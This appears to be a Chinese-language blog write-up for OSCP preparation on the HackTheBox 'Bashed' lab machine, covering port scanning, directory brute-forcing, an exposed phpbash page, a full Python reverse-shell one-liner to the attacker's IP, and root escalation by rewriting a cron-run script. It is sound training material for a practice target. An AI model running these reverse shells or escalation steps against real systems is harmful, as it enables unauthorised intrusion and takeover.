OSCP备考_0x02_HackThBox靶机_Linux_bashed

Ethan医生6个月前靶场198

信息收集

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.204.217(扫描UDP)

image.png

只有80端口 ,找看看phpbash文件在哪

image.png

开始爆破gobuster dir -u http://10.129.204.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

dev底下phpbash.php点进去后可以执行shell命令

image.png

直接使用python进行反弹SHELL

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.31",3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

image.png

然后就是用sudo -u scriptmanager bash

image.png

image.png

使用pyps64查看有没有使用脚本 查看到有定时一分钟使用python test.py文件 所以我要去改这个文件进行反弹SHELL

image.png


将test.py换成反弹3334端口,要去掉python -c

image.png

标签: OSCP

相关文章

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/derpnstink-1,221/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192...

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。